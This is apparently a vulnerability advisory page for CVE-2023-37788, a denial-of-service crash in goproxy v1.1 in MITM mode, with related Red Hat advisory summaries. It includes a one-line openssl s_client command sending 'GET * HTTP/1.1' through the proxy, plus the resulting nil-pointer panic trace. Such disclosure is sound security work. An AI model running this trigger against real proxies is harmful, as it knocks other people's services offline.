Headline
CVE-2023-37788: goproxy v1.1 was discovered to contain an issue which can lead to Denial of Service (DoS) via unspecified vectors · Issue #502 · elazarl/goproxy
goproxy v1.1 was discovered to contain an issue which can lead to a Denial of service (DoS) via unspecified vectors.
A HTTP request to HTTPS page replaced path the “/” with asterix “*” crashes the elazar/goproxy server in MITM mode.
Vulnerability can be triggered by running this command against elazarl/goproxy in MITM Mode.
echo -e "GET * HTTP/1.1\r\n" | openssl s_client -proxy localhost:8000 -connect "localhost:8000" -ign_eof
Similar to this
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x38 pc=0x6b3260]
goroutine 1287 [running]:
github.com/elazarl/goproxy.(*ProxyHttpServer).handleHttps.func2()
/go/pkg/mod/github.com/elazarl/[email protected]/https.go:249 +0xd60
created by github.com/elazarl/goproxy.(*ProxyHttpServer).handleHttps
/go/pkg/mod/github.com/elazarl/[email protected]/https.go:211 +0x611
https://github.com/elazarl/goproxy/blob/master/https.go#L249
Related news
Red Hat Security Advisory 2024-3479-03 - Updated container images are now available for director Operator for Red Hat OpenStack Platform 16.2 for RHEL 8.4. Issues addressed include a denial of service vulnerability.
Red Hat Security Advisory 2023-5407-01 - OpenShift GitOps KAM OpenShift GitOps Kubernetes Application Manager CLI tool. Issues addressed include a denial of service vulnerability.
An update for openshift-gitops-kam is now available for Red Hat OpenShift GitOps 1.10. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-37788: A flaw was found in goproxy, which is vulnerable to a denial of service caused by improper input validation. This flaw allows a remote attacker can cause the goproxy server to crash by sending a specially crafted HTTP request to the HTTPS page, replacing the path "/" with an asterisk "*".
goproxy v1.1 was discovered to contain an issue which can lead to a Denial of service (DoS) via unspecified vectors.